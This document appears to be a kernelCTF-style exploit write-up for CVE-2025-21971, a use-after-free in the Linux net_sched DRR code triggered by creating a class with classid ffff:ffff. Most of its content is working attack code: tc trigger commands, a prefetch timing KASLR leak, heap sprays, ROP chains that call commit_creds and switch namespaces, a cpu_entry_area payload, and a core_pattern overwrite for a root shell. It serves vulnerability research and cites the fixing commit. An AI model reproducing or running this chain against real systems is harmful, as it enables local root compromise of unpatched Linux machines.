# Overview

In `qdisc_tree_reduce_backlog()`, the walk up the qdisc hierarchy terminates once the parent id equals `TC_H_ROOT` [1]. However, in a classful qdisc such as DRR, we can create a class whose classid is `TC_H_ROOT` (`ffff:ffff`), so the while loop can terminate even though the parent is not the actual root qdisc. As a result, `qdisc_tree_reduce_backlog()` fails to properly notify the parent qdiscs.

```c
void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
{
    bool qdisc_is_offloaded = sch->flags & TCQ_F_OFFLOADED;
    const struct Qdisc_class_ops *cops;
    unsigned long cl;
    u32 parentid;
    bool notify;
    int drops;

    if (n == 0 && len == 0)
        return;
    drops = max_t(int, n, 0);
    rcu_read_lock();
    while ((parentid = sch->parent)) {
        if (parentid == TC_H_ROOT) // [1]
            break;

        if (sch->flags & TCQ_F_NOPARENT)
            break;
        /* Notify parent qdisc only if child qdisc becomes empty.
         *
         * If child was empty even before update then backlog
         * counter is screwed and we skip notification because
         * parent class is already passive.
         *
         * If the original child was offloaded then it is allowed
         * to be seem as empty, so the parent is notified anyway.
         */
        notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
                                               !qdisc_is_offloaded);
        /* TODO: perform the search on a per txq basis */
        sch = qdisc_lookup_rcu(qdisc_dev(sch), TC_H_MAJ(parentid));
        if (sch == NULL) {
            WARN_ON_ONCE(parentid != TC_H_ROOT);
            break;
        }
        cops = sch->ops->cl_ops;
        if (notify && cops->qlen_notify) {
            cl = cops->find(sch, parentid);
            cops->qlen_notify(sch, cl);
        }
        sch->q.qlen -= n;
        sch->qstats.backlog -= len;
        __qdisc_qstats_drop(sch, drops);
    }
    rcu_read_unlock();
}
```

We can trigger the UAF as follows; a sketch of the setup appears after the list.

- Create a DRR Qdisc `ffff:`
- Create a DRR class `ffff:ffff`, whose classid equals `TC_H_ROOT`
- Create a DRR class `ffff:0001`
- Create a NetEM Qdisc `2:` as a child of `ffff:0001`
- Send a packet to `ffff:0001`
- Send a packet to `ffff:ffff`
- Delete the DRR class `ffff:ffff`
- Send a packet to trigger the UAF
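
A minimal sketch of this setup, assuming the `tc(8)` CLI on device `lo` with illustrative handles and a match-all filter; the exploit performs the equivalent operations directly over netlink:

```c
#include <stdlib.h>

// Reproduce the trigger sequence with tc(8); run with CAP_NET_ADMIN inside
// a user+net namespace. Packet sending and per-class steering are sketched
// as comments since they depend on the chosen filters.
int main(void) {
    system("tc qdisc add dev lo root handle ffff: drr");
    // The vulnerable kernel accepts a class whose classid is TC_H_ROOT:
    system("tc class add dev lo parent ffff: classid ffff:ffff drr");
    system("tc class add dev lo parent ffff: classid ffff:1 drr");
    system("tc qdisc add dev lo parent ffff:1 handle 2: netem delay 100ms");
    // Add filters steering one packet into ffff:1 and one into ffff:ffff
    // (e.g. one u32 match per destination port), then send the two packets:
    system("tc filter add dev lo parent ffff: protocol ip prio 1 "
           "u32 match u32 0 0 flowid ffff:1");
    // Deleting the TC_H_ROOT class leaves stale state behind, because
    // qdisc_tree_reduce_backlog() stops at classid ffff:ffff:
    system("tc class del dev lo classid ffff:ffff");
    // The next packet dequeued through the DRR qdisc triggers the UAF.
    return 0;
}
```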

# KASLR Bypass

We use a timing side-channel attack to leak the kernel base.
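
One common construction in kernelCTF exploits is the prefetch-based probe (EntryBleed, CVE-2022-4543) against the syscall entry code; a minimal sketch, assuming that technique and an illustrative, build-specific `entry_SYSCALL_64` offset:

```c
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <x86intrin.h>

/* Hypothetical offset of entry_SYSCALL_64 from the kernel base,
 * taken from the target build's System.map. */
#define ENTRY_SYSCALL_64_OFF 0xe00000ULL

// Time a prefetch of a candidate kernel address: the slot that is actually
// mapped (and TLB-resident after a syscall) prefetches measurably faster
// than the unmapped KASLR candidates.
static uint64_t prefetch_time(uint64_t addr) {
    uint32_t aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_prefetch((const char *)addr, _MM_HINT_T0);
    _mm_prefetch((const char *)addr, _MM_HINT_T0);
    return __rdtscp(&aux) - t0;
}

// Scan the KASLR slots and keep the fastest one; the minimum over many
// trials filters out noise.
static uint64_t leak_kbase(void) {
    uint64_t best = 0, best_t = ~0ULL;
    for (uint64_t base = 0xffffffff80000000ULL;
         base < 0xffffffffc0000000ULL; base += 0x200000ULL) {
        uint64_t t = ~0ULL;
        for (int i = 0; i < 64; i++) {
            syscall(SYS_getpid); /* touch the syscall entry path */
            uint64_t cur = prefetch_time(base + ENTRY_SYSCALL_64_OFF);
            if (cur < t) t = cur;
        }
        if (t < best_t) { best_t = t; best = base; }
    }
    return best;
}
```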

# RIP Control

RIP is controlled in `drr_dequeue()`.

```c
static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
    struct drr_sched *q = qdisc_priv(sch);
    struct drr_class *cl;
    struct sk_buff *skb;
    unsigned int len;

    if (list_empty(&q->active))
        goto out;
    while (1) {
        cl = list_first_entry(&q->active, struct drr_class, alist);
        skb = cl->qdisc->ops->peek(cl->qdisc); // [2]
        if (skb == NULL) {
            qdisc_warn_nonwc(__func__, cl->qdisc);
            goto out;
        }
```

When the DRR class is deleted, both `cl` and `cl->qdisc` are freed. We leave `cl` in its freed state and spray a fake qdisc over the freed `cl->qdisc`, which gives us control of RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's `ops` to `drr_qdisc_ops` causes `qdisc_peek_dequeued()` below to be invoked as the `peek` handler.

```c
static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch)
{
    struct sk_buff *skb = skb_peek(&sch->gso_skb);

    /* we can reuse ->gso_skb because peek isn't called for root qdiscs */
    if (!skb) {
        skb = sch->dequeue(sch); // [3]

        if (skb) {
            __skb_queue_head(&sch->gso_skb, skb);
            /* it's still part of the queue */
            qdisc_qstats_backlog_inc(sch, skb);
            sch->q.qlen++;
        }
    }

    return skb;
}
```

In `qdisc_peek_dequeued()`, if the `sch->gso_skb` queue is empty, `sch->dequeue` is called [3]. Since `dequeue` sits at offset `0x8` of `struct Qdisc`, we store a stack pivot gadget at this location to start the ROP chain.

For the fake Qdisc spray, we allocate `user_key_payload` and `ctl_buf` objects in `kmalloc-512`.
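
A minimal sketch of the `user_key_payload` half of the spray, with illustrative spray counts and sizes (`ctl_buf` is sprayed analogously through `sendmsg()` control data, as shown later):

```c
#include <keyutils.h>
#include <stdio.h>

#define SPRAY_CNT 64

static key_serial_t keys[SPRAY_CNT];

// user_key_payload has a 24-byte header (rcu_head + datalen), so the key
// data lands at chunk offset 24 and a length of up to 488 bytes keeps the
// whole object in kmalloc-512. A fake Qdisc built at the chunk start must
// account for those header fields (cf. the keylen slot in rop_chain() below).
static void spray_fake_qdisc(const void *payload, size_t len) {
    char desc[32];

    for (int i = 0; i < SPRAY_CNT; i++) {
        snprintf(desc, sizeof(desc), "spray_%d", i);
        keys[i] = add_key("user", desc, payload, len,
                          KEY_SPEC_PROCESS_KEYRING);
        if (keys[i] < 0)
            perror("add_key");
    }
}
```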

For the mitigation kernel, we use a multiq Qdisc to bypass the instance's mitigations: we reclaim the freed `cl->qdisc` with a multiq Qdisc.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
                       struct netlink_ext_ack *extack)
{
    struct multiq_sched_data *q = qdisc_priv(sch);
    int i, err;

    q->queues = NULL;

    if (!opt)
        return -EINVAL;

    err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
    if (err)
        return err;

    q->max_bands = qdisc_dev(sch)->num_tx_queues;

    q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4]
    if (!q->queues)
        return -ENOBUFS;
    for (i = 0; i < q->max_bands; i++)
        q->queues[i] = &noop_qdisc;

    return multiq_tune(sch, opt, extack);
}
```

When the multiq Qdisc is initialized, `q->queues` is allocated in `multiq_init()` [4]. The allocation size is `q->max_bands * sizeof(struct Qdisc *)`, and since `q->max_bands` comes from the device's `num_tx_queues`, which we control, an object of almost any size can be allocated. To bypass the mitigation, we allocate an object larger than `0x2000`, so that it is served by the page allocator. We then delete the multiq Qdisc and reclaim the freed `q->queues` with `ctl_buf` objects.
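
A sketch of the sizing, under the assumption that the interface is created with an inflated `numtxqueues` (device name and counts are illustrative):

```c
#include <stdlib.h>

// num_tx_queues is fixed at interface creation, so creating the device with
// numtxqueues 2048 makes multiq_init() kcalloc() a
// 2048 * sizeof(struct Qdisc *) = 0x4000-byte q->queues array, which exceeds
// KMALLOC_MAX_CACHE_SIZE and comes straight from the page allocator.
int main(void) {
    system("ip link add mq0 numtxqueues 2048 type dummy");
    system("ip link set mq0 up");
    system("tc qdisc add dev mq0 root handle 1: multiq"); /* allocates q->queues */
    system("tc qdisc del dev mq0 root");                  /* frees it for reclaim */
    return 0;
}
```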

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
    struct multiq_sched_data *q = qdisc_priv(sch);
    unsigned int curband = q->curband;
    struct Qdisc *qdisc;
    struct sk_buff *skb;
    int band;

    for (band = 0; band < q->bands; band++) {
        /* cycle through bands to ensure fairness */
        curband++;
        if (curband >= q->bands)
            curband = 0;

        /* Check that target subqueue is available before
         * pulling an skb to avoid head-of-line blocking.
         */
        if (!netif_xmit_stopped(
            netdev_get_tx_queue(qdisc_dev(sch), curband))) {
            qdisc = q->queues[curband];
            skb = qdisc->ops->peek(qdisc); // [5]
            if (skb)
                return skb;
        }
    }
    return NULL;
}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`; it reads `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, we overwrite the `q->queues[]` entries with an address inside `cpu_entry_area`. As a result, `qdisc->ops` also points into `cpu_entry_area`, and finally RIP can be controlled.
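
The `ctl_buf` here is the control-message buffer that `____sys_sendmsg()` allocates whenever `msg_controllen` exceeds its on-stack buffer; a minimal sketch of that spray, assuming the classic blocking-`sendmsg()` construction with illustrative sizes:

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

// ____sys_sendmsg() kmalloc()s msg_controllen bytes and copies our cmsg
// bytes into it; cmsg levels other than SOL_SOCKET are skipped by
// __scm_send() for AF_UNIX, so the data is left uninterpreted. Filling the
// peer's receive queue first makes sendmsg() block inside sock_sendmsg()
// while ctl_buf is still allocated, keeping the sprayed bytes live over
// the freed q->queues pages.
static void spray_ctl_buf(int sk, const void *data, size_t len) {
    static char cbuf[0x4000];
    struct cmsghdr *cmsg = (struct cmsghdr *)cbuf;
    struct msghdr msg = {0};
    struct iovec iov;
    char c = 'A';

    cmsg->cmsg_len = len;              /* one cmsg spanning the payload */
    cmsg->cmsg_level = SOL_SOCKET + 1; /* unknown level: left as raw data */
    cmsg->cmsg_type = 0;
    memcpy(CMSG_DATA(cmsg), data, len - sizeof(struct cmsghdr));

    iov.iov_base = &c;
    iov.iov_len = 1;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = len;          /* ctl_buf allocation size */

    sendmsg(sk, &msg, 0); /* blocks with ctl_buf live if the peer is full */
}
```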

# Post-RIP

For the LTS kernel, the ROP payload is stored in the fake `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RDI` points to the beginning of the `struct Qdisc`, so the `PUSH_RDI_POP_RSP_RET` gadget used below pivots the stack into the sprayed object itself.

```c
void rop_chain(uint64_t *data) {
    int i = 0;

    data[i++] = kbase + POP_POP_POP_RET;      // enqueue
    data[i++] = kbase + PUSH_RDI_POP_RSP_RET; // dequeue

    data[i++] = 0;                            // keylen
    data[i++] = kbase + DRR_QDISC_OPS;        // ops

    // current = find_task_by_vpid(getpid())
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = getpid();
    data[i++] = kbase + FIND_TASK_BY_VPID;

    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = RCU_READ_LOCK_NESTING_OFF;
    data[i++] = kbase + ADD_RAX_RSI_RET;

    // current->rcu_read_lock_nesting = 0 (bypass the RCU-protected section)
    data[i++] = kbase + POP_RCX_RET;
    data[i++] = 0;
    data[i++] = kbase + MOV_RAX_RCX_RET;

    // Bypass "schedule while atomic": set oops_in_progress = 1
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = 1;
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = 0; // gso_skb.next

    data[i++] = kbase + POP_RSI_RET;
    data[i++] = kbase + OOPS_IN_PROGRESS;
    data[i++] = kbase + MOV_RSI_RDI_RET;

    // commit_creds(&init_cred)
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = kbase + INIT_CRED;
    data[i++] = kbase + COMMIT_CREDS;

    // find_task_by_vpid(1)
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = 1;
    data[i++] = kbase + FIND_TASK_BY_VPID;

    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
    data[i++] = kbase + MOV_RDI_RAX_RET;
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = kbase + INIT_NSPROXY;
    data[i++] = kbase + SWITCH_TASK_NAMESPACES;

    data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
    data[i++] = 0;
    data[i++] = 0;
    data[i++] = _user_rip;
    data[i++] = _user_cs;
    data[i++] = _user_rflags;
    data[i++] = _user_sp;
    data[i++] = _user_ss;
}
```

For the COS kernel, the ROP payload is likewise stored in the fake `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to `struct Qdisc + 0x80`, so the `MOV_RSP_RBP_POP_RBP_RET` gadget pivots the stack there; the `i += 12` below skips the chain ahead to that offset.

```c
void rop_chain(uint64_t *data) {
    int i = 0;

    data[i++] = 0;                               // enqueue
    data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET; // dequeue

    data[i++] = 0;                               // keylen
    data[i++] = kbase + DRR_QDISC_OPS;           // ops

    i += 12; // skip to Qdisc+0x80, where RBP points when dequeue is called

    data[i++] = 0; // gso_skb.next (popped into RBP by the pivot)

    // current = find_task_by_vpid(getpid())
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = getpid();
    data[i++] = kbase + FIND_TASK_BY_VPID;

    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = RCU_READ_LOCK_NESTING_OFF;
    data[i++] = kbase + ADD_RAX_RSI_RET;

    // current->rcu_read_lock_nesting = 0 (bypass the RCU-protected section)
    data[i++] = kbase + POP_RCX_RET;
    data[i++] = 0;
    data[i++] = kbase + MOV_RAX_RCX_RET;

    // Bypass "schedule while atomic": set oops_in_progress = 1
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = 1;
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = kbase + OOPS_IN_PROGRESS;
    data[i++] = kbase + MOV_RSI_RDI_RET;

    // commit_creds(&init_cred)
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = kbase + INIT_CRED;
    data[i++] = kbase + COMMIT_CREDS;

    // find_task_by_vpid(1)
    data[i++] = kbase + POP_RDI_RET;
    data[i++] = 1;
    data[i++] = kbase + FIND_TASK_BY_VPID;

    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
    data[i++] = kbase + MOV_RDI_RAX_RET;
    data[i++] = kbase + POP_RSI_RET;
    data[i++] = kbase + INIT_NSPROXY;
    data[i++] = kbase + SWITCH_TASK_NAMESPACES;

    data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
    data[i++] = 0;
    data[i++] = 0;
    data[i++] = _user_rip;
    data[i++] = _user_cs;
    data[i++] = _user_rflags;
    data[i++] = _user_sp;
    data[i++] = _user_ss;
}
```

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
    if (fork()) {
        return;
    }

    struct cpu_entry_area_payload payload = {};

    payload.regs[0] = kbase + QDISC_RESET;              // multiq->ops->peek
    payload.regs[1] = kbase + POP_POP_RET;
    payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset
    payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF;   // fake ops
    payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
    payload.regs[5] = kbase + CORE_PATTERN;
    payload.regs[6] = MMAP_ADDR;
    payload.regs[7] = strlen((char *)MMAP_ADDR);
    payload.regs[8] = 0;
    payload.regs[9] = kbase + COPY_FROM_USER;
    payload.regs[10] = kbase + MSLEEP;

    set_affinity(1);
    signal(SIGFPE, sig_handler);
    signal(SIGTRAP, sig_handler);
    signal(SIGSEGV, sig_handler);
    setsid();

    while (1) {
        write_cpu_entry_area(&payload);
        usleep(10000);
    }
}
```
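
The `write_cpu_entry_area()` helper is not shown; a plausible implementation is the well-known register-spill primitive: `cpu_entry_area` sits at a fixed address, and the exception entry path dumps the saved user registers onto its per-CPU exception stack. A minimal sketch, assuming that technique (which payload slots map to which registers must match `struct cpu_entry_area_payload` on the target):

```c
// Load payload values into general-purpose registers and fault; the
// exception entry saves this register state on the fixed-address
// cpu_entry_area exception stack. sig_handler() (SIGTRAP) lets the spray
// loop continue afterwards. Only r8-r15 are shown here; the real helper
// also places the remaining payload slots.
static void write_cpu_entry_area(struct cpu_entry_area_payload *p) {
    asm volatile(
        "mov 0x00(%0), %%r15\n\t"
        "mov 0x08(%0), %%r14\n\t"
        "mov 0x10(%0), %%r13\n\t"
        "mov 0x18(%0), %%r12\n\t"
        "mov 0x20(%0), %%r11\n\t"
        "mov 0x28(%0), %%r10\n\t"
        "mov 0x30(%0), %%r9\n\t"
        "mov 0x38(%0), %%r8\n\t"
        "int3\n\t" /* #BP: registers spilled onto the entry stack */
        :
        : "r"(p)
        : "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "memory");
}
```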

When RIP is controlled, `qdisc_reset()` is called first.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
    const struct Qdisc_ops *ops = qdisc->ops;

    trace_qdisc_reset(qdisc);

    if (ops->reset)
        ops->reset(qdisc); // [6]

    __skb_queue_purge(&qdisc->gso_skb);
    __skb_queue_purge(&qdisc->skb_bad_txq);

    qdisc->q.qlen = 0;
    qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called while the `RBX` register holds an address inside `cpu_entry_area` [6]. Therefore, pointing `ops->reset` at a stack pivot gadget (`PUSH_RBX_POP_RSP_RBP_RET` above) starts the ROP chain. Finally, the `core_pattern` overwrite technique is used to gain a root shell.
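
A sketch of that final step, assuming `MMAP_ADDR` holds a `|/path/to/helper`-style string that the chain's `copy_from_user()` writes over `core_pattern`: once the overwrite lands, any crashing process makes the kernel run the piped helper as root in the init namespaces.

```c
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

// After core_pattern is overwritten with e.g. "|/proc/%P/fd/666 %P"
// (pointing back at an attacker-controlled script), crash a child: the
// kernel's usermode helper then runs that script with full root
// privileges, from which the shell is popped.
static void trigger_core_pattern(void) {
    pid_t pid = fork();

    if (pid == 0)
        *(volatile int *)0 = 0; /* SIGSEGV -> core dump -> helper runs */
    waitpid(pid, NULL, 0);
}
```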

# Vulnerability

- Requirements:
  - Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
  - Kernel configuration: CONFIG_NET_SCHED
  - User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=066a3b5b2346 ([NET_SCHED] sch_api: fix qdisc_tree_decrease_qlen() loop)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0c3057a5a04d07120b3d0ec9c79568fceb9c921e (net_sched: Prevent creation of classes with TC_H_ROOT)
- Affected Version: v2.6.25 - v6.14-rc6
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-21971
- Description: In the Linux kernel, the following vulnerability has been resolved: net_sched: Prevent creation of classes with TC_H_ROOT The function qdisc_tree_reduce_backlog() uses TC_H_ROOT as a termination condition when traversing up the qdisc tree to update parent backlog counters. However, if a class is created with classid TC_H_ROOT, the traversal terminates prematurely at this class instead of reaching the actual root qdisc, causing parent statistics to be incorrectly maintained. In case of DRR, this could lead to a crash as reported by Mingi Cho. Prevent the creation of any Qdisc class with classid TC_H_ROOT (0xFFFFFFFF) across all qdisc types, as suggested by Jamal.

# Build

```make
exploit:
	gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
	sudo apt-get install libkeyutils-dev
```